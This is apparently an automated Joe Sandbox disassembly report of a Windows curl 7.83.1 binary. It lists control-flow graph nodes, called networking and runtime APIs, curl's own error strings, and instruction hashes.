1042->1043 1043->1010 1044->1015 1045->1037 1048 8778bb-8778c7 call 87752d 1045->1048 1046->1014 1047->1026 1058 8778c9-8778d8 1048->1058 1053 87778f-877796 1050->1053 1054 8777b8 1050->1054 1053->1054 1056 877798-8777b6 1053->1056 1057 8777be-8777cc 1054->1057 1056->1057 1059 8777ce-8777d5 1057->1059 1060 87780a-87780d 1057->1060 1061 87790c-877912 1058->1061 1062 8778da-87790a WSAEnumNetworkEvents WSAEventSelect 1058->1062 1059->1060 1063 8777d7-877808 send 1059->1063 1064 877836-877847 1060->1064 1065 87780f-877824 WSAEventSelect 1060->1065 1061->1045 1062->1058 1062->1061 1063->1065 1064->1034 1068 87784d-87784f 1064->1068 1066 877826-877830 1065->1066 1067 877894-87789b 1065->1067 1066->1050 1066->1064 1069 8778b4 1067->1069 1070 87789d-8778b3 free 1067->1070 1068->1032 1071 877851-87785b call 88f35e 1068->1071 1069->1048 1070->1069 1073 877860-877864 1071->1073 1073->1032 1073->1038
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00877728
                                • send.WS2_32(?,00000000,00000000,00000000), ref: 008777EA
                                • WSAEventSelect.WS2_32(?,?,00000000), ref: 0087781C
                                • WSAWaitForMultipleEvents.WS2_32(00000001,000000DC,00000000,000003E8,00000000,00000000,00000000,00000000), ref: 00877879
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008778B1
                                • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008778EE
                                • WSAEventSelect.WS2_32(?,?,00000000), ref: 00877900
                                • WSAResetEvent.WS2_32(?), ref: 00877925
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00877948
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Event$EventsSelectfree$EnumMultipleNetworkResetWaitmallocsend
                                • String ID: 2
                                • API String ID: 760094153-450215437
                                • Opcode ID: ea591040777ee724d626f056d4f2aabb1572af7dcecb8c8268476389661bf876
                                • Instruction ID: 1f2965d2d1946ece758def5da308ea2d9c6d968193101f7982558bcdb0ed08f9
                                • Opcode Fuzzy Hash: ea591040777ee724d626f056d4f2aabb1572af7dcecb8c8268476389661bf876
                                • Instruction Fuzzy Hash: 7EA1AE70A047199FDB248F28CC84BAAB7B6FF45310F1082A9956ED7295DB30DD85CF51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1075 87ee55-87eeb6 call 87f472 1078 87eebc-87eedc call 87e407 1075->1078 1079 87f1ab-87f1b9 call 8b0ca6 1075->1079 1084 87eede-87ef14 call 87a0b8 call 87d6ad 1078->1084 1085 87ef19-87ef38 call 87d632 1078->1085 1107 87f045-87f05b call 87f3fc 1084->1107 1089 87ef43-87ef4a 1085->1089 1090 87ef3a-87ef41 1085->1090 1092 87ef6d-87ef73 1089->1092 1093 87ef4c-87ef60 1089->1093 1090->1089 1090->1092 1094 87ef7a-87ef88 call 87edc5 1092->1094 1093->1094 1096 87ef62-87ef66 call 87ed5e 1093->1096 1103 87ef9c-87efa3 1094->1103 1104 87ef8a-87ef91 1094->1104 1100 87ef6b 1096->1100 1100->1094 1108 87efe7-87efee 1103->1108 1109 87efa5-87efd8 call 879622 * 2 1103->1109 1104->1103 1106 87ef93-87ef97 call 87dcb0 1104->1106 1106->1103 1107->1079 1110 87eff0-87eff7 1108->1110 1111 87eff9-87f015 call 87dedf 1108->1111 1141 87f037-87f039 1109->1141 1142 87efda 1109->1142 1110->1111 1116 87f060-87f0a8 ioctlsocket call 89480b 1110->1116 1111->1116 1122 87f017-87f032 call 87f3fc 1111->1122 1124 87f0aa-87f0d6 call 87941d * 2 1116->1124 1125 87f0d9-87f0e0 1116->1125 1122->1079 1124->1125 1128 87f196-87f1a9 1125->1128 1129 87f0e6-87f0ea 1125->1129 1128->1079 1129->1128 1134 87f0f0-87f0fd 1129->1134 1137 87f0ff-87f116 connect 1134->1137 1138 87f128-87f139 WSAGetLastError 1134->1138 1137->1138 1144 87f118-87f120 1137->1144 1139 87f185 1138->1139 1140 87f13b-87f141 1138->1140 1147 87f187-87f194 1139->1147 1140->1139 1145 87f143-87f146 1140->1145 1146 87efe1 1141->1146 1148 87f03b 1141->1148 1142->1146 1144->1079 1149 87f126 1144->1149 1145->1139 1150 87f148-87f183 call 87a0b8 call 87d632 call 87f3fc 1145->1150 1146->1108 1147->1079 1148->1107 1149->1147 1150->1079
                                APIs
                                  • Part of subcall function 0087E407: htons.WS2_32(?), ref: 0087E43C
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 0087EEDE
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087EEE6
                                  • Part of subcall function 0087A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A0C3
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0CB
                                  • Part of subcall function 0087A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0DD
                                  • Part of subcall function 0087A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 0087A0EC
                                  • Part of subcall function 0087A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 0087A0F6
                                  • Part of subcall function 0087A0B8: _strrchr.LIBCMT ref: 0087A142
                                  • Part of subcall function 0087A0B8: _strrchr.LIBCMT ref: 0087A15C
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A173
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A180
                                  • Part of subcall function 0087A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A188
                                  • Part of subcall function 0087A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0087A193
                                  • Part of subcall function 0087F3FC: closesocket.WS2_32(00881EF4), ref: 0087F433
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrclosesockethtonsstrncpy
                                • String ID: Trying %s:%d...$*$0Lu@Ru@/Mu$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                • API String ID: 1577232418-3300156261
                                • Opcode ID: 6df3b68ed90164ebbfb187decd183b82db93f1f34f0d46787e4192db4fdcba37
                                • Instruction ID: 9178e6fe1e5b11fe0dca5bbb145c8636257cae3502ec1fbd94100666ea370212
                                • Opcode Fuzzy Hash: 6df3b68ed90164ebbfb187decd183b82db93f1f34f0d46787e4192db4fdcba37
                                • Instruction Fuzzy Hash: FB918031A006589BDF259B28CC84BEDB7B6FF49314F1444EAE80DE7296DA319E848F51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1431 87e820-87e867 1432 87e873-87e892 call 89480b 1431->1432 1433 87e869 1431->1433 1439 87e894-87e8b7 call 87e6db 1432->1439 1440 87e8e2-87e8e4 1432->1440 1434 87e86c-87e86e 1433->1434 1436 87ed4f-87ed5d call 8b0ca6 1434->1436 1439->1436 1449 87e8bd-87e8bf 1439->1449 1443 87e8ea-87e8ff 1440->1443 1444 87e905-87e926 call 88f235 1443->1444 1445 87ebf0 1443->1445 1454 87ea22-87ea25 1444->1454 1455 87e92c-87e976 call 89489d 1444->1455 1447 87ebf6-87ec00 1445->1447 1447->1443 1450 87ec06-87ec1e call 87dd6c 1447->1450 1449->1436 1452 87e8c5-87e8dd call 87e7cc 1449->1452 1463 87ec67-87ec69 1450->1463 1464 87ec20 1450->1464 1452->1436 1459 87eb42-87eb56 call 87e272 1454->1459 1460 87ea2b-87ea32 1454->1460 1470 87e9a4-87e9ac 1455->1470 1471 87e978-87e97e 1455->1471 1474 87ea52-87ea58 1459->1474 1475 87eb5c-87eb9f 1459->1475 1460->1459 1466 87ea38-87ea3a 1460->1466 1463->1434 1473 87ec6f-87ec76 1463->1473 1468 87ec26-87ec5c call 89489d call 87d6ad 1464->1468 1469 87ec22-87ec24 1464->1469 1466->1445 1472 87ea40-87ea4d call 87e272 1466->1472 1508 87ec5f-87ec62 1468->1508 1469->1463 1469->1468 1480 87e9b2-87e9b9 1470->1480 1481 87ea5e 1470->1481 1477 87e984-87e99a call 87d632 1471->1477 1478 87e980-87e982 1471->1478 1472->1474 1473->1434 1482 87ec7c-87ec83 1473->1482 1474->1481 1483 87ebb4-87ebcb call 87e6db 1475->1483 1484 87eba1-87ebb3 call 87f3fc 1475->1484 1477->1470 1478->1470 1478->1477 1480->1481 1487 87e9bf-87e9f8 call 89489d 1480->1487 1488 87ea64-87ea6c 1481->1488 1482->1434 1489 87ec89-87ec9e call 87e30b 1482->1489 1483->1436 1507 87ebd1-87ebd3 1483->1507 1484->1483 1503 87ea1a-87ea20 1487->1503 1504 87e9fa 1487->1504 1488->1445 1496 87ea72-87ea85 WSASetLastError 1488->1496 1489->1434 1506 87eca4-87ecab 1489->1506 1496->1445 1502 87ea8b-87ead8 call 88e310 call 87a0b8 call 87d632 call 87dd6c 1496->1502 1535 87eae5-87eb16 call 87e2d4 call 87e30b 1502->1535 1536 87eada-87eae0 call 8b3040 1502->1536 1503->1488 1509 87ea00-87ea19 call 87e30b 1504->1509 1510 87e9fc-87e9fe 1504->1510 1512 87ecb5-87ecbc 1506->1512 1513 87ecad-87ecb3 1506->1513 1507->1436 1514 87ebd9-87ebe4 call 87e7cc 1507->1514 1508->1436 1509->1503 1510->1503 1510->1509 1518 87ecc6-87eccd 1512->1518 1519 87ecbe-87ecc4 1512->1519 1517 87ecd7-87ed43 call 87a0b8 call 89489d call 87d6ad 1513->1517 1526 87ebe9-87ebeb 1514->1526 1517->1508 1538 87ed49 1517->1538 1523 87ecd4 1518->1523 1524 87eccf-87ecd2 1518->1524 1519->1517 1523->1517 1524->1517 1526->1434 1544 87eb2c-87eb3d 1535->1544 1545 87eb18-87eb26 1535->1545 1536->1535 1538->1436 1544->1447 1545->1445 1545->1544
                                Strings
                                • After %I64dms connect time, move on!, xrefs: 0087E98C
                                • Failed to connect to %s port %u after %I64d ms: %s, xrefs: 0087ED2B
                                • L', xrefs: 0087E99A
                                • connect to %s port %u failed: %s, xrefs: 0087EAB2
                                • Connection timeout after %ld ms, xrefs: 0087EC51
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID:
                                • String ID: After %I64dms connect time, move on!$Connection timeout after %ld ms$Failed to connect to %s port %u after %I64d ms: %s$L'$connect to %s port %u failed: %s
                                • API String ID: 0-861291074
                                • Opcode ID: b5728f80c4c852197543672cac58cab4db86b8e7b2718a8a37416f89d83b848d
                                • Instruction ID: 05c757798288655a0af79d3ed13900fa775e2d4c408dc7fd1c57e61d0ded1cfc
                                • Opcode Fuzzy Hash: b5728f80c4c852197543672cac58cab4db86b8e7b2718a8a37416f89d83b848d
                                • Instruction Fuzzy Hash: DBE1C2319006549BDF25DE288C857EA7776FF89324F1481E8EC0DEF39ADA719D818B81

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1546 87e574-87e5ce call 8b20c0 getsockname 1549 87e5f0-87e60c call 87e407 1546->1549 1550 87e5d0-87e5ee WSAGetLastError call 87a0b8 1546->1550 1556 87e63e-87e64c call 8b0ca6 1549->1556 1557 87e60e-87e630 call 87a0b8 1549->1557 1555 87e635-87e63b call 87d6ad 1550->1555 1555->1556 1557->1555
                                APIs
                                • getsockname.WS2_32(?,?,?), ref: 0087E5C6
                                • WSAGetLastError.WS2_32(?,?,?), ref: 0087E5D0
                                  • Part of subcall function 0087A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A0C3
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0CB
                                  • Part of subcall function 0087A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A0DD
                                  • Part of subcall function 0087A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 0087A0EC
                                  • Part of subcall function 0087A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 0087A0F6
                                  • Part of subcall function 0087A0B8: _strrchr.LIBCMT ref: 0087A142
                                  • Part of subcall function 0087A0B8: _strrchr.LIBCMT ref: 0087A15C
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A173
                                  • Part of subcall function 0087A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0087A180
                                  • Part of subcall function 0087A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0087A188
                                  • Part of subcall function 0087A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0087A193
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 0087E60E
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 0087E616
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrgetsocknamestrncpy
                                • String ID: 0Lu@Ru@/Mu$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                • API String ID: 2515041809-1685220302
                                • Opcode ID: 965aacde64c36c739810f10cb5874f62d1f5931fcde4a0b11e6bbcceb7eb4613
                                • Instruction ID: b00eade04b01627bf76102b01174b3e044aa493092a3d3969e4d86bcaa5d2cac
                                • Opcode Fuzzy Hash: 965aacde64c36c739810f10cb5874f62d1f5931fcde4a0b11e6bbcceb7eb4613
                                • Instruction Fuzzy Hash: 1B215E72900618ABDB14AB68DC45BEE77B8FB49314F408199F90DD3241EE709E858FA1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1566 86cbae-86cbc7 1567 86ccd0-86ccdd call 869c50 1566->1567 1568 86cbcd-86cbd3 1566->1568 1572 86cce2-86cce5 1567->1572 1568->1567 1569 86cbd9-86cbfa call 872235 call 872362 1568->1569 1576 86ccfd-86cd01 1569->1576 1578 86cc00-86cc06 1569->1578 1574 86cce7-86cce9 1572->1574 1574->1576 1579 86cc0c-86cc1a call 872677 1578->1579 1580 86ccba-86ccc2 1578->1580 1586 86cc4c-86cc5a call 872677 1579->1586 1587 86cc1c-86cc2b _strdup 1579->1587 1581 86ccc4-86ccc7 call 8816ca 1580->1581 1582 86cccc-86ccce 1580->1582 1581->1582 1582->1567 1582->1574 1594 86cc93-86cca1 call 872677 1586->1594 1595 86cc5c-86cc6b _strdup 1586->1595 1589 86cc2d-86cc3e call 872920 call 869199 1587->1589 1590 86cc8b-86cc91 call 872920 1587->1590 1605 86cc43-86ccfc 1589->1605 1600 86ccb6-86ccb9 1590->1600 1594->1587 1606 86cca7-86ccb4 call 86305c 1594->1606 1598 86cc87 1595->1598 1599 86cc6d-86cc85 call 872920 call 869159 1595->1599 1598->1590 1599->1605 1600->1580 1605->1576 1606->1600
                                APIs
                                  • Part of subcall function 00872677: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00887EE5,?,?,?,00888727,?,?,00000000,?,?,?,00888849,00000000,?,?), ref: 008726C4
                                  • Part of subcall function 00872677: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00888849,00000000,?,?,?,00872373,?,?,?,?,008616C6,?,00200030), ref: 008726DF
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0086CC1D
                                  • Part of subcall function 00872920: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00869117,?,?,?,00000000,Failed to create/open output), ref: 00872935
                                  • Part of subcall function 00872677: GetEnvironmentVariableA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00000000,00000001,?,?,?,00888727,?,?,00000000,?,?,?,00888849,00000000,?), ref: 00872698
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0086CC5D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupfree$EnvironmentVariablerealloc
                                • String ID: CURL_CA_BUNDLE$SSL_CERT_DIR$SSL_CERT_FILE$out of memory
                                • API String ID: 8184070-1311070097
                                • Opcode ID: 32debddc8888407d1b20b20218517057d2fb9767dcda0f20d3f3fc164fed4bfb
                                • Instruction ID: 03168f5c594b5a56875e7ec5044276d9086e11ce6207f2b1686ebf92de918f79
                                • Opcode Fuzzy Hash: 32debddc8888407d1b20b20218517057d2fb9767dcda0f20d3f3fc164fed4bfb
                                • Instruction Fuzzy Hash: 0531E971A046469FCB16ABBC98516FDBBE4FF11310F164069E588EB351EB74CE40C792

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1613 86ce40-86ce67 _strdup setlocale 1615 86ce92-86ce96 call 86dc15 1613->1615 1616 86ce69-86ce6b 1613->1616 1623 86ce9b-86ce9f 1615->1623 1617 86cece-86cee4 call 868599 1616->1617 1618 86ce6d-86ce80 strncmp 1616->1618 1634 86cee6-86cee9 call 8689a1 1617->1634 1635 86cef5-86cef8 1617->1635 1621 86ce82-86ce90 call 87251e 1618->1621 1622 86cebf-86cec6 free 1618->1622 1621->1615 1621->1622 1628 86cec7-86cec9 1622->1628 1626 86cea1-86ceaa 1623->1626 1627 86cebb-86cebd 1623->1627 1626->1627 1631 86ceac-86ceba call 869159 1626->1631 1627->1622 1627->1628 1632 86ceee-86cef4 1628->1632 1633 86cecb 1628->1633 1631->1627 1633->1617 1634->1632 1635->1632 1638 86cefa-86cefd 1635->1638 1640 86cf06-86cf09 1638->1640 1641 86ceff-86cf04 call 868a54 1638->1641 1643 86cf12-86cf15 1640->1643 1644 86cf0b-86cf10 call 868b82 1640->1644 1641->1632 1645 86cf17-86cf1a 1643->1645 1646 86cf1c-86cf28 1643->1646 1644->1632 1645->1632 1646->1632
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0086CE46
                                • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000,008B74AB,?,00000000,?,?,?,0086901E,?), ref: 0086CE59
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,008C0780,00000002), ref: 0086CE75
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0086CEC0
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupfreesetlocalestrncmp
                                • String ID: --disable$z
                                • API String ID: 792593065-3267513583
                                • Opcode ID: 476863e49219e44cfffff967f16c57eba85b5b140529054948eada9c64cdfa73
                                • Instruction ID: 6446a5e02a901d7313386cd47109253dcfd025fead699758a351e6573ebf6692
                                • Opcode Fuzzy Hash: 476863e49219e44cfffff967f16c57eba85b5b140529054948eada9c64cdfa73
                                • Instruction Fuzzy Hash: DE213B31700705DBCF74AA68ED96B7D2772FB44760F224426F986DA691CFB2CC8092D2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1650 868f92-868fa4 _mbscmp 1651 868fa6-868fb1 call 86310d 1650->1651 1652 868fd8-86900f call 870b38 QueryPerformanceFrequency call 8631fa call 868e58 1650->1652 1657 868fb3-868fc6 call 8720f5 1651->1657 1658 868fc8-868fd6 call 870e10 1651->1658 1668 869011-869025 call 86ce26 call 868eec 1652->1668 1669 86902a-869033 fflush 1652->1669 1657->1658 1666 869035-86903a 1658->1666 1668->1669 1669->1666
                                APIs
                                • _mbscmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,--dump-module-paths), ref: 00868F9A
                                • QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0(008CFAF8), ref: 00868FF7
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0086902C
                                  • Part of subcall function 0086310D: CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0(00000008,00000000), ref: 00863148
                                  • Part of subcall function 0086310D: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00863155
                                  • Part of subcall function 0086310D: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 0086316F
                                  • Part of subcall function 008720F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00868A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00872101
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: CloseCreateErrorFrequencyHandleLastPerformanceQuerySnapshotToolhelp32__acrt_iob_func_mbscmpfflush
                                • String ID: %s$--dump-module-paths$YR{
                                • API String ID: 3670006343-1349242960
                                • Opcode ID: 33738e776a458a9ffec6d21fa96cd9f99fba34c21b005675d1f57b954f97255d
                                • Instruction ID: 0b9688d305ff1d363022af8707f3ecf4b3cc1f045314ac1fbf69943e9a8b749b
                                • Opcode Fuzzy Hash: 33738e776a458a9ffec6d21fa96cd9f99fba34c21b005675d1f57b954f97255d
                                • Instruction Fuzzy Hash: 6E0102336446129BC7196728E802B6A3751FF81760F164219F85CD72D1EF71DD008B52
                                APIs
                                • WSAStartup.WS2_32(00000202,974AC7AE), ref: 0087D2A5
                                • WSACleanup.WS2_32 ref: 0087D31F
                                  • Part of subcall function 00894E72: GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA,?,?,0087D2C2), ref: 00894EB0
                                  • Part of subcall function 0087D33A: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D34B
                                  • Part of subcall function 0087D33A: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D363
                                  • Part of subcall function 0087D33A: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,008B7348,?,?,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D374
                                  • Part of subcall function 0087D33A: LoadLibraryExA.KERNELBASE(?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D3B6
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,if_nametoindex), ref: 0087D2DF
                                • QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0(008CFAE8), ref: 0087D315
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: AddressProc$CleanupFrequencyHandleLibraryLoadModulePerformanceQueryStartup_mbspbrk
                                • String ID: if_nametoindex$iphlpapi.dll
                                • API String ID: 3026270583-3097795196
                                • Opcode ID: 1d32f3cdb44d05bc0d71cf6dea073326bd7f1d7b1f8b82114790650e0d4c062f
                                • Instruction ID: 1c07faf44b1b6de6141ab23f0f8f077a9594b10e9cbfcb2f73ccd65551860a89
                                • Opcode Fuzzy Hash: 1d32f3cdb44d05bc0d71cf6dea073326bd7f1d7b1f8b82114790650e0d4c062f
                                • Instruction Fuzzy Hash: AC11E5716147019BE720AB78AC1AF6A37B9FF45710F404529EB5DC6296FA30D8058753
                                APIs
                                • WSASetLastError.WS2_32(00002726,00000000,00000000,00000000), ref: 0088F506
                                • __aulldvrm.LIBCMT ref: 0088F55C
                                • select.WS2_32(00000100,?,?,?,?), ref: 0088F5E9
                                • __WSAFDIsSet.WS2_32(000000FF,?), ref: 0088F623
                                • __WSAFDIsSet.WS2_32(000000FF,?), ref: 0088F65B
                                • __WSAFDIsSet.WS2_32(000000FF,?), ref: 0088F679
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLast__aulldvrmselect
                                • String ID:
                                • API String ID: 1566158641-0
